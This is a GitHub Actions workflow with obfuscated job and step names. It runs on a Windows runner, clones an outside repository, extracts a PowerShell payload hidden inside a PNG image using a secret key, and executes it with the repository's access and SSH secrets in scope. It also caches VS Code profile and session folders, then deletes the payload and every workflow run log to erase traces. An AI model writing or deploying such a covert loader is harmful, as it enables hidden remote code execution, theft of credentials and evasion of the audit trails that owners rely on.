name: r4dx

on:
  workflow_dispatch:

jobs:
  j_712:
    runs-on: windows-latest
    permissions:
      actions: write
      contents: read

    steps:
      - name: x_1
        uses: actions/checkout@v4
        
      - name: x_2
        uses: actions/cache@v4
        with:
          path: |
            ~\AppData\Roaming\Code
            ~\.vscode\extensions
            C:\Windows\Temp\app_sessions
          key: ${{ runner.os }}-ghost-session
          restore-keys: |
            ${{ runner.os }}-ghost-session

      - name: x_3
        shell: powershell
        env:
          A_KEY: ${{ secrets.ACCESS_KEY }}
          D_KEY: ${{ secrets.DEX_KEY }}
          SSH_KEY: ${{ secrets.SSH_KEY }}
        run: |
          git clone https://github.com/Sxeldest/dex-enc.git dx_t --quiet
          pip install -r dx_t/requirements.txt --quiet
          $p = Join-Path $pwd "BondeXJS.png"
          if (Test-Path $p) {
              # Tambahkan --out-payload dengan path spesifik ke direktori saat ini
              python dx_t/dexenc.py extract -i $p -key "$env:D_KEY" --out-payload "$pwd\r.ps1"
              
              if (Test-Path "$pwd\r.ps1") {
                  Write-Host "[+] Executing extracted payload..." -ForegroundColor Green
                  . "$pwd\r.ps1"
                  Remove-Item "$pwd\r.ps1" -Force
                  Remove-Item -Recurse -Force dx_t
              } else {
                  Write-Host "[-] Payload file not found in root!" -ForegroundColor Red
                  exit 1
              }
          }
          
      - name: x_4
        uses: Mattraks/delete-workflow-runs@v2
        if: always()
        with:
          token: ${{ github.token }}
          repository: ${{ github.repository }}
          retain_days: 0
          keep_minimum_runs: 0
